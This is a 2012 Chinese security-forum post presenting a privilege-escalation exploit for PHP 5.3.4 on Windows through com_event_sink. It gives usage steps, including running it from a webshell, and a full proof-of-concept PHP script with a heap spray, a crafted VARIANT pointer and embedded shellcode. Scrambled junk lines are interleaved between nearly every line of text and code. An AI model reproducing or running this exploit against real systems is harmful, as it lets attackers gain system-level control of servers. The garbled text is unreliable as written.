中国网络渗透测试联盟
标题:
PHP 5.3.4(WIN) COM_SINK权限提升漏洞
[打印本页]
作者:
admin
时间:
2012-11-9 21:08
标题:
PHP 5.3.4(WIN) COM_SINK权限提升漏洞
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
3 Z( v/ I }8 R! E8 ^
" P6 e6 U2 u' r( I! H+ ~, u/ t
测试方法如下:cmd /c x:\php\php.exe x:\test.php
& @3 }" a+ R$ O7 E( G- f) ~
% _. H0 {$ K3 ?. s9 @
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
( w0 E& _$ b5 J4 @4 E( z7 x
这里是两个测试的截图:
" U. S5 C* h& a. k" `# G: n
& ?- ~# K& L3 k; E' ^4 m
& {6 _, D: B/ K
5 T, C; C! I+ x: b L+ x0 [/ P
. q& e9 \% _, o
6 V+ `% _/ g' L% {& [. D
成功利用此漏洞的攻击者将获得系统的最高权限
7 r% J- }. f. g, G7 X7 b7 `
+ [ I5 k! k) w8 q/ e
5 B; A# j+ {' v6 H: a
$ j5 u: a2 b* v6 G9 {- w
: ^0 d9 |+ n: v3 f" R5 d/ O& e' R
% r5 \) D1 |; D7 c, ~1 [* q: K5 \
关于漏洞分析稍后附上。一下是PoC代码:
l( l7 x( A' Y" Y
: ^! A3 h" H. _2 O/ p) |" Z
<?php
0 _3 ^7 c: m, K1 [% m3 B
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
8 O2 u$ p) W" k @# n! H% p
//$eip ="\x44\x43\x42\x41";
: |$ ^% t S& ]' h4 e9 ]- n0 g6 E
$eip= "\x4b\xe8\x57\x78";
/ u0 }7 j, b3 @( ?+ a3 V6 D
$eax ="\x80\x01\x8d\x04";
( Y% m, F/ `: L
$deodrant="";
. M& g: b- r# S& X
$axespray = str_repeat($eip.$eax,0x80);
: l" Q! j7 t2 M' Z% K. w
//048d0190
; c% n& \# S/ E& i- X) x. u" O
echo strlen($axespray);
' Q+ M" T: J% b; } u1 s0 W
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
1 }, k7 o6 _# n' S: r' n
echo "Silic Group Hacker Army - BlackBap.Org";
, c! X* O* Z5 B$ {
//19200 ==4B32 4b00
4 k' z5 m4 ?% n! a; m! ~. c- Q) i
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
$ b# B( Y2 \7 t! ?
$terminate = "T";
9 x3 r; F7 S) w& X$ J
$u[] =$deodrant;
. I% [8 L; L ^8 W! }
$r[] =$deodrant.$terminate;
& |! i" e5 W% |
$a[] =$deodrant.$terminate;
* h7 F: l+ N \; V0 S& k h
$s[] =$deodrant.$terminate;
) B& d& M8 x0 t7 F" ^
//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的
4 u# _1 Y4 V, y/ `( B1 Y0 o
$vVar = new VARIANT(0x048d0000+180);
1 D. v$ C7 w. a, B. U% o5 E' q
//弹窗代码(Shellcode)
0 ~# E8 V- I6 D: ~, T) C& l2 b
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
. \( Z Z. r7 [- w9 d
$var2 = new VARIANT(0x41414242);
1 k* H/ i! }8 {/ p
com_event_sink($vVar,$var2,$buffer);
' J5 o" F4 ?1 c( K
?>
* e" j) J; m0 }2 Z8 V1 \
[attach]113[/attach][attach]114[/attach]
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2